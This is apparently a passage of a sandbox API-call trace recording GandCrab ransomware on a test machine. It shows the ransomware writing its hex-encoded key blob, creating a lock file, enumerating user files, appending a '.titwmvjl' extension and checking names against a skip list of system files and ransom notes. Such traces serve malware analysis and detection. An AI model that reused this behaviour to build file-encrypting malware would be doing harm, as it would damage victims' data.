\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.833] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0072.834] CloseHandle (hObject=0x2c4) returned 1 [0072.834] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.835] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.835] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x98)) [0072.835] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.835] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.835] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.836] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a09d2ca4deb61a.lock") returned 85 [0072.836] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0072.837] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.837] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\") returned 61 [0072.838] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*" [0072.838] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5036f8 [0072.838] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.838] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.838] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.838] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.838] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.838] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.838] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.838] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a09d2ca4deb61a.lock" [0072.838] lstrlenW (lpString=".titwmvjl") returned 9 [0072.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a09d2ca4deb61a.lock") returned 85 [0072.838] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.839] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 94 [0072.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a09d2ca4deb61a.lock") returned 85 [0072.839] lstrlenW (lpString=".lock") returned 5 [0072.839] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.839] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.839] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.839] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.839] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.840] lstrcmpW (lpString1="Preferences.dat", lpString2=".") returned 1 [0072.840] lstrcmpW (lpString1="Preferences.dat", lpString2="..") returned 1 [0072.840] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="Preferences.dat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat" [0072.840] lstrlenW (lpString=".titwmvjl") returned 9 [0072.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0072.840] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.840] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat.titwmvjl") returned 85 [0072.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0072.840] lstrlenW (lpString=".dat") returned 4 [0072.840] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.840] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".dat ") returned 5 [0072.840] lstrcmpiW (lpString1=".dat", lpString2=".titwmvjl") returned -1 [0072.840] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.841] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0072.841] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="desktop.ini") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="autorun.inf") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="ntuser.dat") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="iconcache.db") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="bootsect.bak") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="boot.ini") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="ntuser.dat.log") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="thumbs.db") returned -1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="KRAB-DECRYPT.html") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="CRAB-DECRYPT.html") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="ntldr") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="NTDETECT.COM") returned 1 [0072.841] lstrcmpiW (lpString1="Preferences.dat", lpString2="Bootfont.bin") returned 1 [0072.841] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0072.841] lstrlenW (lpString=".dat") returned 4 [0072.841] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.841] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".dat ") returned 5 [0072.841] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.841] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.842] CreateFileW 